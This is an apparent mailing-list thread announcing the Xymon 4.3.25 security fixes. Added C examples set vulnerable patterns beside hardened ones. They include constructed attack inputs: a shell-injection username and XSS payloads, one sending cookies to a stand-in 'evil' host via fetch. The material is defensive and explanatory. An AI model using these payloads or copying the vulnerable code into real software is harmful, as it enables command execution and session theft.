Xymon Mailing List Archive search

Xymon 4.3.25 - Important Security Update

5 messages in this thread

list Japheth Cleaver · Mon, 8 Feb 2016 12:06:39 -0800 ·
Hello all,


Xymon 4.3.25 has been released and is now available for download at
https://sourceforge.net/projects/xymon/


Version 4.3.25 includes fixes for several security issues in the server
component of the Xymon monitoring system, which are further detailed
below. In addition, there are several other feature additions, and several
bug fixes and reliability improvements.

Full release notes and a Changelog are available at
https://sourceforge.net/projects/xymon/files/Xymon/4.3.25/

These issues affect all versions of Xymon 4.3.x prior to 4.3.25, as well
as the obsolete 4.1.x and 4.2.x versions. All Xymon users are strongly
encouraged to upgrade their server component.


We would like to greatly thank Markus Krell for his responsible reporting
of these issues and for his assistance in testing their resolution.


And as always, thank you to everyone who has contributed code or submitted
feature suggestions or bug reports to the Xymon project.


Regards,

Japheth "J.C." Cleaver
Xymon 4.x Maintainer


* CVE-2016-2054: Buffer overflow in xymond handling of "config" command:
The xymond daemon performs an unchecked copying of a user-supplied
filename to a fixed-size buffer when handling a "config" command. This
may be used to trigger a buffer overflow in xymond, possibly resulting
in remote code execution and/or denial of service of the Xymon
monitoring system. This code will run with the privileges of the xymon
userid.

This bug may be triggered by anyone with network access to the xymond
service on port 1984, unless access has been restricted with the
"--status-senders" option (a non-default configuration).

This bug has been patched in Xymon 4.3.25.


* CVE-2016-2055: Access to possibly confidential files in the Xymon
configuration directory:
The xymond daemon will allow anyone with network access to the xymond
network port (1984) to download configuration files in the Xymon "etc"
directory. In a default installation, the Apache htaccess file
"xymonpasswd" controlling access to the administrator webpages is
installed in this directory and is therefore available for download. The
passwords in the file are hashed, but may then be brute-forced off-line.

This bug may be triggered by anyone with network access to the xymond
service on port 1984, unless access has been restricted with the
"--status-senders" option (a non-default configuration).

Administrators of existing installations should ensure that the
xymonpasswd file is not readable by the userid running the xymond
daemon. Permissions should be: Owner=webserver UID, group=webserver GID,
mode rw-rw--- (600). This will be the default configuration starting
with Xymon 4.3.25. In addition, the "config" command will only allow
access to regular files. By default, only files ending in ".cfg" may be
directly retrieved, although this can be overridden by the administrator,
and config files may include other files and directories using existing
directives.

Alternatively, the file may be moved to a location outside the Xymon
configuration directory. The Xymon cgioptions.cfg file must then be
edited so CGI_USERADM_OPTS and CGI_CHPASSWD_OPTS include
"--passwdfile=FILENAME".


* CVE-2016-2056: Shell command injection in the "useradm" and "chpasswd"
web applications:
The useradm and chpasswd web applications may be used to administer
passwords for user authentication in Xymon, acting as a web frontend to
the Apache "htpasswd" application. The htpasswd command is invoked via a
shell command, and it is therefore possible to inject arbitrary commands
and have them executed with the privileges of the webserver (CGI) user.

This bug can only be triggered by web users with access to the Xymon
webpages, who are already authenticated as Xymon users. However, when
combined with CVE-2016-xxxx which allows for off-line cracking of
password hashes, this bug may be exploitable by others.

This bug has been patched in Xymon 4.3.25.


* CVE-2016-2057: Incorrect permissions on IPC queues used by the xymond
daemon can bypass IP access filtering:
An IPC message queue used by the xymon daemon is created with
world-write permissions, allowing a local user on the Xymon master
server to inject all types of messages into Xymon, bypassing any
IP-based access controls.

Exploitation of this bug requires local access to the Xymon master server.

This bug has been patched in Xymon 4.3.25.


* CVE-2016-2058: JavaScript injection in "detailed status webpage" of
monitoring items:
A status message sent from a Xymon client may contain any data,
including HTML, which will be included on the "detailed status" page
available via the Xymon status web interface. A malicious user may send a
status message containing custom JavaScript code, which will then be
rendered in the browser of the user viewing the status page.

Exploitation of this bug requires that you can control the contents of a
status message sent to Xymon, which is possible if you control one of
the servers monitored by Xymon, or the Xymon master server. Also, the
bug requires a user to actually view the "detailed status" webpage.

This bug has been patched in Xymon 4.3.25 by including a
"Content-Security-Policy" HTTP header in the response sent to the
browser. This means that older browsers may still be vulnerable to this
issue.


* CVE-2016-2058: XSS vulnerability via malformed acknowledgment messages:
(Note that this uses the same CVE id as the JavaScript injection issue)
The message sent by a user to indicate acknowledgment of an alert is not
HTML-escaped before being displayed on the status webpage, which may be
used to trigger a cross-site scripting vulnerability.

Exploitation of this bug requires that the attacker is able to
acknowledge an alert status. This requires user-authenticated access to
the Xymon webpages, or that the user receives a message (usually via
e-mail) containing the authentication token for the acknowledgment.

This bug has been patched in Xymon 4.3.25.
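The two xymond issues above, CVE-2016-2054 and CVE-2016-2055, both sit in the handling of the "config" command. The following is an added example and not Xymon's own code: it shows the unchecked-copy pattern for contrast, then a hardened request handler that bounds the copy, keeps the name inside the etc directory, applies the ".cfg" default the announcement describes, and serves only regular files. The function names, the buffer size and the `etcdir` argument are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#define CFG_NAME_MAX 256   /* assumed size of the fixed name buffer */

/* The vulnerable pattern (CVE-2016-2054): the request's filename is
 * copied into a fixed-size buffer with no length check, so a name
 * longer than CFG_NAME_MAX overruns it. Shown for contrast only;
 * never call it with untrusted input. */
void vulnerable_config_copy(char dst[CFG_NAME_MAX], const char *request_name)
{
    strcpy(dst, request_name);
}

/* Returns 1 if NAME may be served by the "config" command, else 0.
 * Rules: fits the buffer with room for a NUL, contains no path
 * separator or "..", and ends in ".cfg" (the 4.3.25 default described
 * in the announcement, which an administrator may relax). */
int config_name_allowed(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len >= CFG_NAME_MAX) return 0;
    if (strchr(name, '/') != NULL || strstr(name, "..") != NULL) return 0;
    if (len < 5 || strcmp(name + len - 4, ".cfg") != 0) return 0;
    return 1;
}

/* Returns 1 only if PATH exists and is a regular file; directories,
 * devices, FIFOs and sockets are refused (the CVE-2016-2055 rule). */
int is_regular_file(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0) return 0;
    return S_ISREG(st.st_mode) ? 1 : 0;
}

/* Bounded replacement for the copy above: validates NAME, then builds
 * "ETCDIR/NAME" into OUT (size OUTLEN). Returns 0 on success, -1 if the
 * name is rejected or the result would not fit. */
int resolve_config_path(const char *etcdir, const char *name,
                        char *out, size_t outlen)
{
    if (!config_name_allowed(name)) return -1;
    int n = snprintf(out, outlen, "%s/%s", etcdir, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Builds a name longer than the buffer and confirms it is rejected
 * before any copy happens. Returns 1 when the check holds. */
int long_name_rejected(void)
{
    char name[CFG_NAME_MAX + 64];
    memset(name, 'A', sizeof name - 1);
    name[sizeof name - 1] = '\0';
    return config_name_allowed(name) == 0;
}

static char resolved[512];   /* scratch output for the demo below */

int main(void)
{
    /* Constructed sample requests: one legitimate, one aimed at the
     * htpasswd file, one traversal attempt. */
    const char *requests[] = { "hosts.cfg", "xymonpasswd", "../../etc/passwd" };
    for (size_t i = 0; i < 3; i++) {
        int rc = resolve_config_path("/home/xymon/server/etc", requests[i],
                                     resolved, sizeof resolved);
        if (rc != 0)
            printf("config %-20s -> rejected by name check\n", requests[i]);
        else if (!is_regular_file(resolved))
            printf("config %-20s -> %s is not a regular file\n", requests[i], resolved);
        else
            printf("config %-20s -> serving %s\n", requests[i], resolved);
    }
    return 0;
}
```

The name check runs before any copy, so an overlong name never reaches a buffer; the regular-file check runs after path construction, so a directory or device under etc cannot be streamed back. Note that, as the announcement says, an included file reached through an existing include directive is not subject to the ".cfg" rule, so the permissions advice for xymonpasswd still applies.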
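CVE-2016-2056 is the classic shape of a CGI that builds a shell command line from form fields. As an added example that is not the Xymon useradm/chpasswd code, here is the vulnerable command-string construction next to a version that validates the username and execs htpasswd with an argument vector, so shell metacharacters in a field are data rather than syntax. The htpasswd path, the username rules and the helper names are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Vulnerable pattern (CVE-2016-2056): user-controlled fields are
 * interpolated into a line that /bin/sh parses, so a username such as
 * "bob; id > /tmp/pwned" runs a second command as the CGI user.
 * Only builds the string here; system(cmd) would be the injection point. */
int build_shell_command_vulnerable(char *cmd, size_t cmdlen,
        const char *passwdfile, const char *user, const char *pass)
{
    int n = snprintf(cmd, cmdlen, "htpasswd -b %s %s %s", passwdfile, user, pass);
    return (n < 0 || (size_t)n >= cmdlen) ? -1 : 0;
}

/* Returns 1 if USER is a plausible htpasswd account name: letters,
 * digits, '.', '_', '@', '-', at most 64 bytes, and no leading '-'
 * (which htpasswd would otherwise parse as an option). */
int username_allowed(const char *user)
{
    size_t len = strlen(user);
    if (len == 0 || len > 64 || user[0] == '-') return 0;
    for (size_t i = 0; i < len; i++) {
        char c = user[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '.' || c == '_' ||
              c == '@' || c == '-'))
            return 0;
    }
    return 1;
}

/* Runs ARGV[0] directly via execv(), with no shell in between, and
 * returns the child's exit status (127 if the binary could not be
 * executed, -1 on fork/wait failure). */
int run_argv(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Sets USER's password in PASSWDFILE by exec'ing HTPASSWD (assumed
 * path) with an argument vector. Returns htpasswd's exit status, or -1
 * if the username fails validation. Passing the password with -b puts
 * it on the command line where other local users can see it in ps;
 * htpasswd's -i (read from stdin) avoids that and is the better choice
 * where the installed version supports it. */
int set_password(const char *htpasswd, const char *passwdfile,
                 const char *user, const char *pass)
{
    if (!username_allowed(user)) return -1;
    char *const argv[] = { (char *)htpasswd, "-b", (char *)passwdfile,
                           (char *)user, (char *)pass, NULL };
    return run_argv(argv);
}

/* Shows why the argv matters: the hostile string that would have run a
 * second command through system() arrives in the child untouched when
 * passed as one argv element. The child script is a constant; the
 * attacker string is only ever $1. Returns 1 if the child saw it verbatim. */
int demo_metachars_are_literal(void)
{
    char *const argv[] = { "/bin/sh", "-c", "test \"$1\" = 'bob; id > /tmp/pwned'",
                           "sh", "bob; id > /tmp/pwned", NULL };
    return run_argv(argv) == 0;
}

int main(void)
{
    char cmd[256];
    const char *evil = "bob; id > /tmp/pwned";   /* constructed hostile input */
    build_shell_command_vulnerable(cmd, sizeof cmd, "/tmp/xymonpasswd", evil, "pw");
    printf("shell would run : %s\n", cmd);
    printf("validator says  : %s\n", username_allowed(evil) ? "allowed" : "rejected");
    printf("argv passthrough: %s\n", demo_metachars_are_literal() ? "literal" : "altered");
    return 0;
}
```

The validator is the first line of defence and the argv exec is the second; either alone closes the shell-injection path, but the allow-list also stops option injection and keeps the password file name from being rewritten by a crafted username.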
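Both CVE-2016-2058 items above are output-encoding bugs: attacker-controlled text (a status message body, an acknowledgment message) is written into the status page as-is. The announcement says 4.3.25 answers the first with a Content-Security-Policy header, which pre-CSP browsers ignore. As an added example that is not Xymon's code, the block below escapes untrusted text before rendering and emits a restrictive CSP header alongside it; the escaping function, the rendering helper and the exact policy string are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Writes an HTML-escaped copy of SRC into DST (size DSTLEN), encoding
 * the five characters that can break out of text or attribute context.
 * Returns the number of bytes written (excluding the NUL), or -1 if DST
 * is too small; DST is NUL-terminated on success. */
int html_escape(char *dst, size_t dstlen, const char *src)
{
    size_t out = 0;
    for (const unsigned char *p = (const unsigned char *)src; *p; p++) {
        const char *rep;
        char one[2] = { (char)*p, '\0' };
        switch (*p) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (out + rl >= dstlen) return -1;     /* keep room for the NUL */
        memcpy(dst + out, rep, rl);
        out += rl;
    }
    dst[out] = '\0';
    return (int)out;
}

/* A restrictive policy (assumed, not Xymon's actual header): no inline
 * scripts and no third-party script sources, so a payload that somehow
 * survives escaping still cannot run in a CSP-aware browser. Browsers
 * that predate CSP ignore the header, which is the limitation the
 * announcement notes; escaping is what protects them. */
const char *status_page_csp(void)
{
    return "Content-Security-Policy: default-src 'self'; "
           "script-src 'self'; object-src 'none'\r\n";
}

/* Renders one acknowledgment line into OUT (size OUTLEN), escaping both
 * the acknowledging user and the free-text message. Returns 0, or -1 if
 * either field or the result does not fit. */
int render_ack_line(char *out, size_t outlen, const char *who, const char *msg)
{
    char ewho[256], emsg[1024];
    if (html_escape(ewho, sizeof ewho, who) < 0) return -1;
    if (html_escape(emsg, sizeof emsg, msg) < 0) return -1;
    int n = snprintf(out, outlen, "<p>Acknowledged by %s: %s</p>", ewho, emsg);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Renders a constructed hostile ack message and returns 1 if no raw
 * <script> tag survives into the output. */
int ack_escapes_script(void)
{
    char line[512];
    if (render_ack_line(line, sizeof line, "mallory",
                        "<script>alert(document.cookie)</script>") != 0) return 0;
    return strstr(line, "<script>") == NULL && strstr(line, "&lt;script&gt;") != NULL;
}

static char scratch[64];   /* scratch buffer for small escaping demos */

int main(void)
{
    char line[512];
    /* Constructed sample: a status-message fragment a compromised
     * client might send. */
    const char *hostile = "disk ok <img src=x onerror=\"fetch('//evil/'+document.cookie)\">";
    fputs("Content-Type: text/html\r\n", stdout);
    fputs(status_page_csp(), stdout);
    fputs("\r\n", stdout);
    if (render_ack_line(line, sizeof line, "ops", hostile) == 0)
        puts(line);
    return 0;
}
```

The header and the escaping serve different failure modes: escaping stops the markup from being parsed as markup in every browser, while the policy limits what an injected script could do if some other rendering path is missed.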
list Jeremy Laidman · Mon, 08 Feb 2016 20:29:20 +0000 ·
JC

Reporting some typos, in case you're republishing these notes:

"However, when combined with CVE-2016-xxxx" needs the xxxx updated.

"mode rw-rw--- (600)" should be 660.

Cheers
Jeremy
quoted from Japheth Cleaver

list Japheth Cleaver · Mon, 8 Feb 2016 12:37:07 -0800 ·
Hello all,

The Terabithia RPM release of Xymon has been updated to 4.3.25.

In addition to the 4.3.25 fixes detailed in the release notes, the RPM
includes a fix for a separate, unrelated, buffer overflow issue which
could allow a remote user to crash the server, or potentially execute
arbitrary code by sending a specially crafted message.

This issue did not affect any normal release version of Xymon 4.3.x or below.


Thank you to Matt Vander Werf for his report, and his assistance in
validating its resolution.

All users are urged to upgrade to the latest RPM version, 4.3.25-1 or higher.


Regards,
-jc
list Ryan Novosielski · Tue, 9 Feb 2016 16:27:25 -0500 ·
quoted from Jeremy Laidman
Am I right that:

A) The critical component to upgrade here is the server running the
Xymon display (less so the xymonnet machines, if any) and...
B) A Xymon 4.3.12 xymonnet machine will operate correctly with a Xymon
4.3.25 server that is receiving the status messages and generating the
web pages?

-- 
Ryan Novosielski - Senior Technologist
Rutgers Biomedical and Health Sciences (formerly UMDNJ), OIRT/High Perf & Res Comp - MSB C630, Newark
user-46c89e614701@xymon.invalid - 973/972.0922 (2x0922)
list Japheth Cleaver · Tue, 9 Feb 2016 14:36:39 -0800 ·
quoted from Ryan Novosielski

On Tue, February 9, 2016 1:27 pm, Ryan Novosielski wrote:
Am I right that:

A) The critical component to upgrade here is the server running the
Xymon display (less so the xymonnet machines, if any) and...
B) A Xymon 4.3.12 xymonnet machine will operate correctly with a Xymon
4.3.25 server that is receiving the status messages and generating the
web pages?

A) The most critical items are the CGI directory, correct. Typically
that's your Xymon display server, although strictly speaking it's possible
to have xymongen + page output, CGI scripts, and xymond on three different
servers.

If you can't update your core xymond server at this time, you should
validate the permissions on all files in your $XYMONHOME/etc/ directory to
ensure the user xymond is running as doesn't have read access to anything
it shouldn't.

B) Correct. You should be fine going from 4.3.12 reporting to a 4.3.25.
The reverse (new xymonnet to 4.3.12 xymond) won't work due to the new
extcombo format not being understood.


Regards,
-jc
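The interim advice in the reply above, to check every file under $XYMONHOME/etc/ against the user xymond runs as, can be done mechanically. The following is an added example and not part of Xymon: it walks a directory and lists the regular files a given user could read according to the owner, group and other permission bits, so a still-readable xymonpasswd shows up. The function names and the command-line usage are assumptions; only the user's primary group is consulted, so supplementary group membership (for example the xymon user being in the webserver's group) must be checked separately with `id`.

```c
#include <dirent.h>
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Returns 1 if a process running as UID with primary group GID can read
 * a file of mode MODE owned by OWNER:GROUP, judged by the mode bits
 * alone (no ACLs, no supplementary groups). Root always reads. */
int can_read_mode(mode_t mode, uid_t owner, gid_t group, uid_t uid, gid_t gid)
{
    if (uid == 0) return 1;
    if (uid == owner) return (mode & S_IRUSR) != 0;
    if (gid == group) return (mode & S_IRGRP) != 0;
    return (mode & S_IROTH) != 0;
}

/* Walks DIR (one level, no recursion) and prints each regular file that
 * UID/GID can read. Returns the number of such files, or -1 if DIR
 * cannot be opened. Symlinks are not followed. */
int report_readable(const char *dir, uid_t uid, gid_t gid)
{
    DIR *d = opendir(dir);
    if (d == NULL) return -1;
    int count = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        char path[4096];
        int n = snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        if (n < 0 || (size_t)n >= sizeof path) continue;
        struct stat st;
        if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode)) continue;
        if (can_read_mode(st.st_mode, st.st_uid, st.st_gid, uid, gid)) {
            printf("readable by uid %u: %s (mode %04o, owner %u:%u)\n",
                   (unsigned)uid, path, (unsigned)(st.st_mode & 07777),
                   (unsigned)st.st_uid, (unsigned)st.st_gid);
            count++;
        }
    }
    closedir(d);
    return count;
}

/* Usage (assumed): xymon_etc_check /home/xymon/server/etc xymon */
int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s ETCDIR USER\n", argv[0]);
        return 2;
    }
    struct passwd *pw = getpwnam(argv[2]);
    if (pw == NULL) {
        fprintf(stderr, "unknown user: %s\n", argv[2]);
        return 2;
    }
    int n = report_readable(argv[1], pw->pw_uid, pw->pw_gid);
    if (n < 0) {
        perror(argv[1]);
        return 2;
    }
    printf("%d readable file(s); anything private, such as xymonpasswd, should not be listed\n", n);
    return 0;
}
```

With the ownership and mode from the announcement (webserver UID and GID, rw-rw----, which is octal 660 as Jeremy points out), xymonpasswd is listed only if the xymon user is the webserver user or shares its primary group, which is exactly the configuration to avoid.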